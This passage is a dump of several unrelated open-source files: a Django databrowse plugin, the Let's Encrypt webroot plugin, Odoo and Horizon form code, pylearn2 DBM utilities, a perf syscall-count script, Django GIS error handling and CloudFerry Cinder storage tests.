open(lib_cpp_name, 'w').write(lib_cpp_template.format(**kwargs))
open(test_cpp_name, 'w').write(lib_cpp_test_template.format(**kwargs))
open('meson.build', 'w').write(lib_cpp_meson_template.format(**kwargs))
| apache-2.0 |
kdwink/intellij-community | python/lib/Lib/site-packages/django/contrib/databrowse/plugins/fieldchoices.py | 252 | 3856 | from django import http
from django.db import models
from django.contrib.databrowse.datastructures import EasyModel
from django.contrib.databrowse.sites import DatabrowsePlugin
from django.shortcuts import render_to_response
from django.utils.text import capfirst
from django.utils.encoding import smart_str, force_unicode
from django.utils.safestring import mark_safe
import urllib
class FieldChoicePlugin(DatabrowsePlugin):
def __init__(self, field_filter=None):
# If field_filter is given, it should be a callable that takes a
# Django database Field instance and returns True if that field should
# be included. If field_filter is None, all fields will be used.
self.field_filter = field_filter
def field_dict(self, model):
"""
Helper function that returns a dictionary of all fields in the given
model. If self.field_filter is set, it only includes the fields that
match the filter.
"""
if self.field_filter:
return dict([(f.name, f) for f in model._meta.fields if self.field_filter(f)])
else:
return dict([(f.name, f) for f in model._meta.fields if not f.rel and not f.primary_key and not f.unique and not isinstance(f, (models.AutoField, models.TextField))])
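# Illustrative (hypothetical) filter: restricting the plugin to CharFields
# would look like
#   FieldChoicePlugin(field_filter=lambda f: isinstance(f, models.CharField))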
def model_index_html(self, request, model, site):
fields = self.field_dict(model)
if not fields:
return u''
return mark_safe(u'<p class="filter"><strong>View by:</strong> %s</p>' % \
u', '.join(['<a href="fields/%s/">%s</a>' % (f.name, force_unicode(capfirst(f.verbose_name))) for f in fields.values()]))
def urls(self, plugin_name, easy_instance_field):
if easy_instance_field.field in self.field_dict(easy_instance_field.model.model).values():
field_value = smart_str(easy_instance_field.raw_value)
return [mark_safe(u'%s%s/%s/%s/' % (
easy_instance_field.model.url(),
plugin_name, easy_instance_field.field.name,
urllib.quote(field_value, safe='')))]
def model_view(self, request, model_databrowse, url):
self.model, self.site = model_databrowse.model, model_databrowse.site
self.fields = self.field_dict(self.model)
# If the model has no fields with choices, there's no point in going
# further.
if not self.fields:
raise http.Http404('The requested model has no fields.')
if url is None:
return self.homepage_view(request)
url_bits = url.split('/', 1)
if self.fields.has_key(url_bits[0]):
return self.field_view(request, self.fields[url_bits[0]], *url_bits[1:])
raise http.Http404('The requested page does not exist.')
def homepage_view(self, request):
easy_model = EasyModel(self.site, self.model)
field_list = self.fields.values()
field_list.sort(key=lambda k: k.verbose_name)
return render_to_response('databrowse/fieldchoice_homepage.html', {'root_url': self.site.root_url, 'model': easy_model, 'field_list': field_list})
def field_view(self, request, field, value=None):
easy_model = EasyModel(self.site, self.model)
easy_field = easy_model.field(field.name)
if value is not None:
obj_list = easy_model.objects(**{field.name: value})
return render_to_response('databrowse/fieldchoice_detail.html', {'root_url': self.site.root_url, 'model': easy_model, 'field': easy_field, 'value': value, 'object_list': obj_list})
obj_list = [v[field.name] for v in self.model._default_manager.distinct().order_by(field.name).values(field.name)]
return render_to_response('databrowse/fieldchoice_list.html', {'root_url': self.site.root_url, 'model': easy_model, 'field': easy_field, 'object_list': obj_list})
| apache-2.0 |
thanatos/lets-encrypt-preview | letsencrypt/plugins/webroot.py | 1 | 6187 | """Webroot plugin."""
import errno
import logging
import os
from collections import defaultdict
import zope.interface
import six
from acme import challenges
from letsencrypt import errors
from letsencrypt import interfaces
from letsencrypt.plugins import common
logger = logging.getLogger(__name__)
@zope.interface.implementer(interfaces.IAuthenticator)
@zope.interface.provider(interfaces.IPluginFactory)
class Authenticator(common.Plugin):
"""Webroot Authenticator."""
description = "Webroot Authenticator"
MORE_INFO = """\
Authenticator plugin that performs http-01 challenge by saving
necessary validation resources to appropriate paths on the file
system. It expects that there is some other HTTP server configured
to serve all files under specified web root ({0})."""
def more_info(self): # pylint: disable=missing-docstring,no-self-use
return self.MORE_INFO.format(self.conf("path"))
@classmethod
def add_parser_arguments(cls, add):
# --webroot-path and --webroot-map are added in cli.py because they
# are parsed in conjunction with --domains
pass
def get_chall_pref(self, domain): # pragma: no cover
# pylint: disable=missing-docstring,no-self-use,unused-argument
return [challenges.HTTP01]
def __init__(self, *args, **kwargs):
super(Authenticator, self).__init__(*args, **kwargs)
self.full_roots = {}
self.performed = defaultdict(set)
def prepare(self): # pylint: disable=missing-docstring
path_map = self.conf("map")
if not path_map:
raise errors.PluginError(
"Missing parts of webroot configuration; please set either "
"--webroot-path and --domains, or --webroot-map. Run with "
" --help webroot for examples.")
for name, path in path_map.items():
if not os.path.isdir(path):
raise errors.PluginError(path + " does not exist or is not a directory")
self.full_roots[name] = os.path.join(path, challenges.HTTP01.URI_ROOT_PATH)
logger.debug("Creating root challenges validation dir at %s",
self.full_roots[name])
# Change the permissions to be writable (GH #1389)
# Umask is used instead of chmod to ensure the client can also
# run as non-root (GH #1795)
old_umask = os.umask(0o022)
try:
# This is coupled with the "umask" call above because
# os.makedirs's "mode" parameter may not always work:
# https://stackoverflow.com/questions/5231901/permission-problems-when-creating-a-dir-with-os-makedirs-python
os.makedirs(self.full_roots[name], 0o0755)
# Set owner as parent directory if possible
try:
stat_path = os.stat(path)
os.chown(self.full_roots[name], stat_path.st_uid,
stat_path.st_gid)
except OSError as exception:
if exception.errno == errno.EACCES:
logger.debug("Insufficient permissions to change owner and uid - ignoring")
else:
raise errors.PluginError(
"Couldn't create root for {0} http-01 "
"challenge responses: {1}", name, exception)
except OSError as exception:
if exception.errno != errno.EEXIST:
raise errors.PluginError(
"Couldn't create root for {0} http-01 "
"challenge responses: {1}", name, exception)
finally:
os.umask(old_umask)
def perform(self, achalls): # pylint: disable=missing-docstring
assert self.full_roots, "Webroot plugin appears to be missing webroot map"
return [self._perform_single(achall) for achall in achalls]
def _get_root_path(self, achall):
try:
path = self.full_roots[achall.domain]
except KeyError:
raise errors.PluginError("Missing --webroot-path for domain: {0}"
.format(achall.domain))
if not os.path.exists(path):
raise errors.PluginError("Mysteriously missing path {0} for domain: {1}"
.format(path, achall.domain))
return path
def _get_validation_path(self, root_path, achall):
return os.path.join(root_path, achall.chall.encode("token"))
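# The resulting file is served at <webroot>/.well-known/acme-challenge/<token>:
# root_path already ends with challenges.HTTP01.URI_ROOT_PATH (joined in
# prepare() above) and encode("token") yields the URL-safe token string.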
def _perform_single(self, achall):
response, validation = achall.response_and_validation()
root_path = self._get_root_path(achall)
validation_path = self._get_validation_path(root_path, achall)
logger.debug("Attempting to save validation to %s", validation_path)
# Change permissions to be world-readable, owner-writable (GH #1795)
old_umask = os.umask(0o022)
try:
with open(validation_path, "w") as validation_file:
validation_file.write(validation.encode())
finally:
os.umask(old_umask)
self.performed[root_path].add(achall)
return response
def cleanup(self, achalls): # pylint: disable=missing-docstring
for achall in achalls:
root_path = self._get_root_path(achall)
validation_path = self._get_validation_path(root_path, achall)
logger.debug("Removing %s", validation_path)
os.remove(validation_path)
self.performed[root_path].remove(achall)
for root_path, achalls in six.iteritems(self.performed):
if not achalls:
try:
os.rmdir(root_path)
logger.debug("All challenges cleaned up, removing %s",
root_path)
except OSError as exc:
if exc.errno == errno.ENOTEMPTY:
logger.debug("Challenges cleaned up but %s not empty",
root_path)
else:
raise
| apache-2.0 |
laslabs/odoo | addons/account_check_printing/account_journal_dashboard.py | 45 | 1200 | # -*- coding: utf-8 -*-
from openerp import models, api, _
class account_journal(models.Model):
_inherit = "account.journal"
@api.multi
def get_journal_dashboard_datas(self):
domain_checks_to_print = [
('journal_id', '=', self.id),
('payment_method_id.code', '=', 'check_printing'),
('state','=','posted')
]
return dict(
super(account_journal, self).get_journal_dashboard_datas(),
num_checks_to_print=len(self.env['account.payment'].search(domain_checks_to_print))
)
@api.multi
def action_checks_to_print(self):
return {
'name': _('Checks to Print'),
'type': 'ir.actions.act_window',
'view_mode': 'list,form,graph',
'res_model': 'account.payment',
'context': dict(
self.env.context,
search_default_checks_to_send=1,
journal_id=self.id,
default_journal_id=self.id,
default_payment_type='outbound',
default_payment_method_id=self.env.ref('account_check_printing.account_payment_method_check').id,
),
}
| agpl-3.0 |
zouyapeng/horizon | openstack_dashboard/dashboards/admin/volumes/volume_types/forms.py | 7 | 5903 | # Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from django.utils.translation import ugettext_lazy as _
from horizon import exceptions
from horizon import forms
from horizon import messages
from openstack_dashboard.api import cinder
class ManageQosSpecAssociation(forms.SelfHandlingForm):
qos_spec_choice = forms.ChoiceField(
label=_("QOS Spec to be associated"),
help_text=_("Choose associated QOS Spec."))
def __init__(self, request, *args, **kwargs):
super(ManageQosSpecAssociation, self).__init__(request,
*args,
**kwargs)
qos_spec_field = self.fields['qos_spec_choice']
qos_spec_field.choices = \
self.populate_qos_spec_choices()
# pre-select the current qos spec, if exists
# if no association exists, the selected entry will be "None"
# since it is index 0 of the choice box
current_qos_spec = self.initial["cur_qos_spec_id"]
if current_qos_spec:
qos_spec_field.initial = current_qos_spec
def populate_qos_spec_choices(self):
# populate qos spec list box
qos_specs = self.initial["qos_specs"]
qos_spec_list = [(qos_spec.id, qos_spec.name)
for qos_spec in qos_specs]
# 'none' is always listed first
qos_spec_list.insert(0, ("-1", _("None")))
return qos_spec_list
def clean_qos_spec_choice(self):
# ensure that new association isn't the same as current association
cleaned_new_spec_id = self.cleaned_data.get('qos_spec_choice')
cur_spec_id = self.initial['cur_qos_spec_id']
found_error = False
if cur_spec_id:
# new = current
if cur_spec_id == cleaned_new_spec_id:
found_error = True
else:
# no current association
if cleaned_new_spec_id == '-1':
# new = current
found_error = True
if found_error:
raise forms.ValidationError(
_('New associated QOS Spec must be different than '
'the current associated QOS Spec.'))
return cleaned_new_spec_id
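# Django invokes clean_<fieldname>() hooks like the one above automatically
# during full_clean()/is_valid(), so no explicit call is needed.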
def handle(self, request, data):
vol_type_id = self.initial['type_id']
new_qos_spec_id = data['qos_spec_choice']
# Update QOS Spec association information
try:
# NOTE - volume types can only be associated with
# ONE QOS Spec at a time
# first we need to un-associate the current QOS Spec, if it exists
cur_qos_spec_id = self.initial['cur_qos_spec_id']
if cur_qos_spec_id:
qos_spec = cinder.qos_spec_get(request,
cur_qos_spec_id)
cinder.qos_spec_disassociate(request,
qos_spec,
vol_type_id)
# now associate with new QOS Spec, if user wants one associated
if new_qos_spec_id != '-1':
qos_spec = cinder.qos_spec_get(request,
new_qos_spec_id)
cinder.qos_spec_associate(request,
qos_spec,
vol_type_id)
messages.success(request,
_('Successfully updated QOS Spec association.'))
return True
except Exception:
exceptions.handle(request,
_('Error updating QOS Spec association.'))
return False
class EditQosSpecConsumer(forms.SelfHandlingForm):
consumer_choice = forms.ChoiceField(
label=_("QOS Spec Consumer"),
choices=cinder.CONSUMER_CHOICES,
help_text=_("Choose consumer for this QOS Spec."))
def __init__(self, request, *args, **kwargs):
super(EditQosSpecConsumer, self).__init__(request, *args, **kwargs)
consumer_field = self.fields['consumer_choice']
qos_spec = self.initial["qos_spec"]
consumer_field.initial = qos_spec.consumer
def clean_consumer_choice(self):
# ensure that new consumer isn't the same as current consumer
qos_spec = self.initial['qos_spec']
cleaned_new_consumer = self.cleaned_data.get('consumer_choice')
old_consumer = qos_spec.consumer
if cleaned_new_consumer == old_consumer:
raise forms.ValidationError(
_('QOS Spec consumer value must be different than '
'the current consumer value.'))
return cleaned_new_consumer
def handle(self, request, data):
qos_spec_id = self.initial['qos_spec_id']
new_consumer = data['consumer_choice']
# Update QOS Spec consumer information
try:
cinder.qos_spec_set_keys(request,
qos_spec_id,
{'consumer': new_consumer})
messages.success(request,
_('Successfully modified QOS Spec consumer.'))
return True
except Exception:
exceptions.handle(request, _('Error editing QOS Spec consumer.'))
return False
| apache-2.0 |
TNick/pylearn2 | pylearn2/models/dbm/__init__.py | 43 | 9023 | """
This module contains functionality related to deep Boltzmann machines.
They are implemented generically in order to make it easy to support
convolution versions, etc.
This code was moved piece by piece incrementally over time from Ian's
private research repository, and it is altogether possible that he
broke something or left out a piece while moving it. If you find any
problems please don't hesitate to contact pylearn-dev and we will fix
the problem and add a unit test.
"""
__authors__ = ["Ian Goodfellow", "Vincent Dumoulin"]
__copyright__ = "Copyright 2012-2013, Universite de Montreal"
__credits__ = ["Ian Goodfellow"]
__license__ = "3-clause BSD"
__maintainer__ = "LISA Lab"
import collections
import logging
import numpy as np
import sys
from pylearn2.compat import OrderedDict
from pylearn2.expr.nnet import inverse_sigmoid_numpy
from pylearn2.blocks import Block
from pylearn2.utils import block_gradient
from pylearn2.utils.rng import make_theano_rng
logger = logging.getLogger(__name__)
logger.debug("DBM changing the recursion limit.")
# We need this to be high enough that the big theano graphs we make
# when unrolling inference don't cause python to complain.
# python intentionally declares stack overflow well before the stack
# segment is actually exceeded. But we can't make this value too big
# either, or we'll get seg faults when the python interpreter really
# does go over the stack segment.
# IG encountered seg faults on eos3 (a machine at LISA labo) when using
# 50000 so for now it is set to 40000.
# I think the actual safe recursion limit can't be predicted in advance
# because you don't know how big of a stack frame each function will
# make, so there is not really a "correct" way to do this. Really the
# python interpreter should provide an option to raise the error
# precisely when you're going to exceed the stack segment.
sys.setrecursionlimit(40000)
def init_sigmoid_bias_from_marginals(dataset, use_y = False):
"""
Returns b such that sigmoid(b) has the same marginals as the
data. Assumes dataset contains a design matrix. If use_y is
true, sigmoid(b) will have the same marginals as the targets,
rather than the features.
Parameters
----------
dataset : WRITEME
use_y : WRITEME
"""
if use_y:
X = dataset.y
else:
X = dataset.get_design_matrix()
return init_sigmoid_bias_from_array(X)
def init_sigmoid_bias_from_array(arr):
"""
.. todo::
WRITEME
"""
X = arr
if not (X.max() == 1):
raise ValueError("Expected design matrix to consist entirely "
"of 0s and 1s, but maximum value is "+str(X.max()))
if X.min() != 0.:
raise ValueError("Expected design matrix to consist entirely of "
"0s and 1s, but minimum value is "+str(X.min()))
# removed this check so we can initialize the marginals
# with a dataset of bernoulli params
# assert not np.any( (X > 0.) * (X < 1.) )
mean = X.mean(axis=0)
mean = np.clip(mean, 1e-7, 1-1e-7)
init_bias = inverse_sigmoid_numpy(mean)
return init_bias
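# Worked example (illustrative): for a column with mean p the returned bias
# is the logit, log(p / (1 - p)), so sigmoid(bias) reproduces the marginal:
#   X = np.array([[0., 1.], [1., 1.]])  # column means 0.5 and 1.0
#   init_sigmoid_bias_from_array(X)     # ~[0.0, logit(1 - 1e-7)] after clipping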
class DBMSampler(Block):
"""
A Block used to sample from the last layer of a DBM with one hidden layer.
Parameters
----------
dbm : WRITEME
"""
def __init__(self, dbm):
super(DBMSampler, self).__init__()
self.theano_rng = make_theano_rng(None, 2012+10+14, which_method="binomial")
self.dbm = dbm
assert len(self.dbm.hidden_layers) == 1
def __call__(self, inputs):
"""
.. todo::
WRITEME
"""
space = self.dbm.get_input_space()
num_examples = space.batch_size(inputs)
last_layer = self.dbm.get_all_layers()[-1]
layer_to_chains = self.dbm.make_layer_to_symbolic_state(
num_examples, self.theano_rng)
# The examples are used to initialize the visible layer's chains
layer_to_chains[self.dbm.visible_layer] = inputs
layer_to_clamp = OrderedDict([(self.dbm.visible_layer, True)])
layer_to_chains = self.dbm.sampling_procedure.sample(
layer_to_state=layer_to_chains,
theano_rng=self.theano_rng,
layer_to_clamp=layer_to_clamp,
num_steps=1
)
rval = layer_to_chains[last_layer]
rval = last_layer.upward_state(rval)
return rval
def get_input_space(self):
"""
.. todo::
WRITEME
"""
return self.dbm.get_input_space()
def get_output_space(self):
"""
.. todo::
WRITEME
"""
return self.dbm.get_output_space()
def stitch_rbms(batch_size, rbm_list, niter, inference_procedure=None,
targets=False):
"""
Returns a DBM initialized with pre-trained RBMs, with weights and biases
initialized according to R. Salakhutdinov's policy.
This method assumes the RBMs were trained normally. It divides the first
and last hidden layer's weights by two and initializes a hidden layer's
biases as the mean of its biases and the biases of the visible layer of the
RBM above it.
"""
assert len(rbm_list) > 1
# For intermediary hidden layers, there are two set of biases to choose
# from: those from the hidden layer of the given RBM, and those from
# the visible layer of the RBM above it. As in R. Salakhutdinov's code,
# we handle this by computing the mean of those two sets of biases.
for this_rbm, above_rbm in zip(rbm_list[:-1], rbm_list[1:]):
hidden_layer = this_rbm.hidden_layers[0]
visible_layer = above_rbm.visible_layer
new_biases = 0.5 * (hidden_layer.get_biases() +
visible_layer.get_biases())
hidden_layer.set_biases(new_biases)
visible_layer = rbm_list[0].visible_layer
visible_layer.dbm = None
hidden_layers = []
for rbm in rbm_list:
# Make sure all DBMs have only one hidden layer, except for the last
# one, which can have an optional target layer
if rbm == rbm_list[-1]:
if targets:
assert len(rbm.hidden_layers) == 2
else:
assert len(rbm.hidden_layers) == 1
else:
assert len(rbm.hidden_layers) == 1
hidden_layers = hidden_layers + rbm.hidden_layers
for hidden_layer in hidden_layers:
hidden_layer.dbm = None
# Divide first and last hidden layer's weights by two, as described
# in R. Salakhutdinov's paper (equivalent to training with RBMs with
# doubled weights)
first_hidden_layer = hidden_layers[0]
if targets:
last_hidden_layer = hidden_layers[-2]
else:
last_hidden_layer = hidden_layers[-1]
first_hidden_layer.set_weights(0.5 * first_hidden_layer.get_weights())
last_hidden_layer.set_weights(0.5 * last_hidden_layer.get_weights())
return DBM(batch_size, visible_layer, hidden_layers, niter,
inference_procedure)
def flatten(l):
"""
Turns a nested graph of lists/tuples/other objects
into a list of objects.
Parameters
----------
l : WRITEME
Returns
-------
WRITEME
"""
if isinstance(l, (list, tuple, collections.ValuesView)):
rval = []
for elem in l:
if isinstance(elem, (list, tuple)):
rval.extend(flatten(elem))
else:
rval.append(elem)
else:
return [l]
return rval
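# Example (illustrative): flatten([1, [2, (3, [4])], 5]) == [1, 2, 3, 4, 5],
# while a non-sequence argument is simply wrapped: flatten(7) == [7].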
def block(l):
"""
.. todo::
WRITEME
"""
new = []
for elem in l:
if isinstance(elem, (list, tuple)):
new.append(block(elem))
else:
new.append(block_gradient(elem))
if isinstance(l, tuple):
return tuple(new)
return new
# Make known modules inside this package
# this needs to come after e.g. flatten(), since DBM depends on flatten()
from pylearn2.models.dbm.dbm import DBM
from pylearn2.models.dbm.inference_procedure import BiasInit
from pylearn2.models.dbm.inference_procedure import InferenceProcedure
from pylearn2.models.dbm.inference_procedure import MoreConsistent
from pylearn2.models.dbm.inference_procedure import MoreConsistent2
from pylearn2.models.dbm.inference_procedure import SuperWeightDoubling
from pylearn2.models.dbm.inference_procedure import WeightDoubling
from pylearn2.models.dbm.layer import BinaryVector
from pylearn2.models.dbm.layer import BinaryVectorMaxPool
from pylearn2.models.dbm.layer import BVMP_Gaussian
from pylearn2.models.dbm.layer import CompositeLayer
from pylearn2.models.dbm.layer import ConvMaxPool
from pylearn2.models.dbm.layer import ConvC01B_MaxPool
from pylearn2.models.dbm.layer import GaussianVisLayer
from pylearn2.models.dbm.layer import HiddenLayer
from pylearn2.models.dbm.layer import Layer
from pylearn2.models.dbm.layer import VisibleLayer
from pylearn2.models.dbm.layer import Softmax
from pylearn2.models.dbm.sampling_procedure import SamplingProcedure
| bsd-3-clause |
DragonDevs/android_kernel_zte_msm8226 | tools/perf/scripts/python/syscall-counts.py | 11181 | 1522 | # system call counts
# (c) 2010, Tom Zanussi <[email protected]>
# Licensed under the terms of the GNU GPL License version 2
#
# Displays system-wide system call totals, broken down by syscall.
# If a [comm] arg is specified, only syscalls called by [comm] are displayed.
import os
import sys
sys.path.append(os.environ['PERF_EXEC_PATH'] + \
'/scripts/python/Perf-Trace-Util/lib/Perf/Trace')
from perf_trace_context import *
from Core import *
from Util import syscall_name
usage = "perf script -s syscall-counts.py [comm]\n";
for_comm = None
if len(sys.argv) > 2:
sys.exit(usage)
if len(sys.argv) > 1:
for_comm = sys.argv[1]
syscalls = autodict()
def trace_begin():
print "Press control+C to stop and show the summary"
def trace_end():
print_syscall_totals()
def raw_syscalls__sys_enter(event_name, context, common_cpu,
common_secs, common_nsecs, common_pid, common_comm,
id, args):
if for_comm is not None:
if common_comm != for_comm:
return
try:
syscalls[id] += 1
except TypeError:
syscalls[id] = 1
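# autodict() creates nested entries lazily: the first increment of a new id
# hits an empty autodict and raises TypeError, so the except branch seeds
# the counter at 1.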
def print_syscall_totals():
if for_comm is not None:
print "\nsyscall events for %s:\n\n" % (for_comm),
else:
print "\nsyscall events:\n\n",
print "%-40s %10s\n" % ("event", "count"),
print "%-40s %10s\n" % ("----------------------------------------", \
"-----------"),
for id, val in sorted(syscalls.iteritems(), key = lambda(k, v): (v, k), \
reverse = True):
print "%-40s %10d\n" % (syscall_name(id), val),
| gpl-2.0 |
wsmith323/django | django/contrib/gis/gdal/error.py | 535 | 1996 | """
This module houses the GDAL & SRS Exception objects, and the
check_err() routine which checks the status code returned by
GDAL/OGR methods.
"""
# #### GDAL & SRS Exceptions ####
class GDALException(Exception):
pass
# Legacy name
OGRException = GDALException
class SRSException(Exception):
pass
class OGRIndexError(GDALException, KeyError):
"""
This exception is raised when an invalid index is encountered, and has
the 'silent_variable_failure' attribute set to true. This ensures that
django's templates proceed to use the next lookup type gracefully when
an Exception is raised. Fixes ticket #4740.
"""
silent_variable_failure = True
# #### GDAL/OGR error checking codes and routine ####
# OGR Error Codes
OGRERR_DICT = {
1: (GDALException, 'Not enough data.'),
2: (GDALException, 'Not enough memory.'),
3: (GDALException, 'Unsupported geometry type.'),
4: (GDALException, 'Unsupported operation.'),
5: (GDALException, 'Corrupt data.'),
6: (GDALException, 'OGR failure.'),
7: (SRSException, 'Unsupported SRS.'),
8: (GDALException, 'Invalid handle.'),
}
# CPL Error Codes
# http://www.gdal.org/cpl__error_8h.html
CPLERR_DICT = {
1: (GDALException, 'AppDefined'),
2: (GDALException, 'OutOfMemory'),
3: (GDALException, 'FileIO'),
4: (GDALException, 'OpenFailed'),
5: (GDALException, 'IllegalArg'),
6: (GDALException, 'NotSupported'),
7: (GDALException, 'AssertionFailed'),
8: (GDALException, 'NoWriteAccess'),
9: (GDALException, 'UserInterrupt'),
10: (GDALException, 'ObjectNull'),
}
ERR_NONE = 0
def check_err(code, cpl=False):
"""
Checks the given CPL/OGRERR, and raises an exception where appropriate.
"""
err_dict = CPLERR_DICT if cpl else OGRERR_DICT
if code == ERR_NONE:
return
elif code in err_dict:
e, msg = err_dict[code]
raise e(msg)
else:
raise GDALException('Unknown error code: "%s"' % code)
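# Illustrative usage: check_err(0) is a no-op, check_err(6) raises
# GDALException('OGR failure.'), and check_err(4, cpl=True) raises
# GDALException('OpenFailed').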
| bsd-3-clause |
archyufa/CloudFerry | tests/cloudferrylib/os/storage/test_cinder_storage.py | 2 | 10299 | # Copyright 2014: Mirantis Inc.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import mock
from cinderclient.v1 import client as cinder_client
from oslotest import mockpatch
from cloudferrylib.os.storage import cinder_storage
from cloudferrylib.utils import utils
from tests import test
FAKE_CONFIG = utils.ext_dict(
cloud=utils.ext_dict({'user': 'fake_user',
'password': 'fake_password',
'tenant': 'fake_tenant',
'host': '1.1.1.1',
'auth_url': 'http://1.1.1.1:35357/v2.0/',
'cacert': '',
'insecure': False}),
migrate=utils.ext_dict({'speed_limit': '10MB',
'retry': '7',
'time_wait': 5,
'keep_volume_storage': False,
'keep_volume_snapshots': False}),
mysql=utils.ext_dict({'db_host': '1.1.1.1'}),
storage=utils.ext_dict({'backend': 'ceph',
'rbd_pool': 'volumes',
'volume_name_template': 'volume-',
'host': '1.1.1.1'}))
class CinderStorageTestCase(test.TestCase):
def setUp(self):
super(CinderStorageTestCase, self).setUp()
self.mock_client = mock.Mock()
self.cs_patch = mockpatch.PatchObject(cinder_client, 'Client',
new=self.mock_client)
self.useFixture(self.cs_patch)
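# useFixture() activates the patch and registers its cleanup, so
# cinder_client.Client stays mocked only for this test's lifetime.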
self.identity_mock = mock.Mock()
self.compute_mock = mock.Mock()
self.fake_cloud = mock.Mock()
self.fake_cloud.position = 'src'
self.fake_cloud.resources = dict(identity=self.identity_mock,
compute=self.compute_mock)
self.cinder_client = cinder_storage.CinderStorage(FAKE_CONFIG,
self.fake_cloud)
self.fake_volume_0 = mock.Mock()
self.fake_volume_1 = mock.Mock()
self.mock_client().volumes.get.return_value = self.fake_volume_0
def test_get_cinder_client(self):
# To check self.mock_client call only from this test method
self.mock_client.reset_mock()
client = self.cinder_client.get_client(FAKE_CONFIG)
self.mock_client.assert_called_once_with('fake_user', 'fake_password',
'fake_tenant',
'http://1.1.1.1:35357/v2.0/',
cacert='', insecure=False)
self.assertEqual(self.mock_client(), client)
def test_get_volumes_list(self):
fake_volume_list = [self.fake_volume_0, self.fake_volume_1]
self.mock_client().volumes.list.return_value = fake_volume_list
volumes_list = self.cinder_client.get_volumes_list(search_opts=dict())
self.mock_client().volumes.list.\
assert_called_once_with(True, dict(all_tenants=True))
self.assertEqual(volumes_list, fake_volume_list)
def test_create_volume(self):
self.mock_client().volumes.create.return_value = self.fake_volume_0
volume = self.cinder_client.create_volume(100500, name='fake')
self.mock_client().volumes.create.assert_called_once_with(100500,
name='fake')
self.assertEqual(self.fake_volume_0, volume)
def test_get_volume_by_id(self):
volume = self.cinder_client.get_volume_by_id('fake_id')
self.mock_client().volumes.get.assert_called_once_with('fake_id')
self.assertEqual(self.fake_volume_0, volume)
def test_delete_volume(self):
self.cinder_client.delete_volume('fake_id')
self.mock_client().volumes.get.assert_called_once_with('fake_id')
self.mock_client().volumes.delete.assert_called_once_with(
self.fake_volume_0)
def test_update_volume(self):
self.cinder_client.update_volume('fake_id', name='new_fake_name')
self.mock_client().volumes.get.assert_called_once_with('fake_id')
self.mock_client().volumes.update.assert_called_once_with(
self.fake_volume_0, name='new_fake_name')
def test_attach_volume(self):
self.mock_client().volumes.attach.return_value = (
'fake_response', 'fake_body')
response, body = self.cinder_client.attach_volume('fake_vol_id',
'fake_instance_id',
'/fake/mountpoint')
test_args = {'instance_uuid': 'fake_instance_id',
'mountpoint': '/fake/mountpoint',
'mode': 'rw'}
self.mock_client().volumes.get.assert_called_once_with('fake_vol_id')
self.mock_client().volumes.attach.assert_called_once_with(
self.fake_volume_0, **test_args)
self.assertEqual(('fake_response', 'fake_body'), (response, body))
def test_detach_volume(self):
self.mock_client().volumes.detach.return_value = (
'fake_response', 'fake_body')
response, body = self.cinder_client.detach_volume('fake_vl_id')
self.mock_client().volumes.detach.assert_called_once_with('fake_vl_id')
self.assertEqual(('fake_response', 'fake_body'), (response, body))
def test_upload_volume_to_image(self):
image = {'os-volume_upload_image': {'image_id': "fake_body"}}
self.mock_client().volumes.upload_to_image.return_value = (
'fake_response', image)
response, body = self.cinder_client.upload_volume_to_image(
'fake_vol_id', True, 'fake_image_name', 'fake_cont_format',
'fake_disk_format')
test_args = {'volume': self.fake_volume_0,
'container_format': 'fake_cont_format',
'force': True,
'image_name': 'fake_image_name',
'disk_format': 'fake_disk_format'}
self.mock_client().volumes.get.assert_called_once_with('fake_vol_id')
self.mock_client().volumes.upload_to_image.assert_called_once_with(
**test_args)
self.assertEqual(('fake_response', 'fake_body'), (response, body))
def test_read_info(self):
temp = self.cinder_client.get_volumes_list
self.cinder_client.get_volumes_list = mock.Mock()
vol1 = mock.Mock(id="id1",
size='size',
display_name='display_name',
display_description='display_description',
availability_zone='availability_zone',
volume_type='volume_type',
attachments=[{'device': 'device'}],
bootable='bootable')
self.cinder_client.get_volumes_list.return_value = [vol1]
res = self.cinder_client.read_info(id="id1")
self.assertIn('volumes', res)
self.assertEqual(1, len(res['volumes']))
self.assertEqual(vol1.id, res['volumes']['id1']['volume']['id'])
self.cinder_client.get_volumes_list = temp
def test_deploy(self):
vol = {'volume': {'size': 'size1',
'display_name': 'display_name1',
'display_description': 'display_description1',
'volume_type': 'volume_type1',
'availability_zone': 'availability_zone1'},
'meta': {'image': {'id': 'image_id1'}}}
info = {'volumes': {'id1': vol}}
create_volume = mock.Mock()
vol_return = mock.Mock(id="id2")
create_volume.return_value = vol_return
wait_for_status = mock.Mock()
finish = mock.Mock()
attach_vol_to_instance = mock.Mock()
self.cinder_client.create_volume = create_volume
self.cinder_client.wait_for_status = wait_for_status
self.cinder_client.finish = finish
self.cinder_client.attach_volume_to_instance = attach_vol_to_instance
res = self.cinder_client.deploy(info)
self.assertIn(vol_return.id, res)
def test_get_volume_path_iscsi(self):
fake_mysql_return = ('fake_ip:fake_port,3 iqn.2010-10.org.openstack:'
'volume-fake_volume_id fake_lun',)
self.fake_cloud.mysql_connector.execute().fetchone.return_value = (
fake_mysql_return)
volume_path = self.cinder_client.get_volume_path_iscsi('fake_vol_id')
expected_volume_path = (
'/dev/disk/by-path/ip-fake_ip:fake_port-iscsi-iqn.2010-10.org.'
'openstack:volume-fake_volume_id-lun-fake_lun')
self.assertEqual(expected_volume_path, volume_path)
self.fake_cloud.mysql_connector.execute.assert_called_with(
"SELECT provider_location FROM volumes WHERE id='fake_vol_id';")
def test_get_volume_path_iscsi_error(self):
fake_mysql_return = None
self.fake_cloud.mysql_connector.execute.return_value = (
fake_mysql_return)
expected_msg = ('There is no such raw in Cinder DB with the specified '
'volume_id=fake_vol_id')
try:
self.cinder_client.get_volume_path_iscsi('fake_vol_id')
except Exception as e:
self.assertEqual(expected_msg, e.message)
self.fake_cloud.mysql_connector.execute.assert_called_once_with(
